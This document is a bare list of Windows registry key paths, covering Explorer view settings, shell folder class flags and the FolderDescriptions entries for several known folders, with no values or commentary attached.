HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar
HKEY_LOCAL_MACHINE\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\VolumePref
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PublishExpandedPath
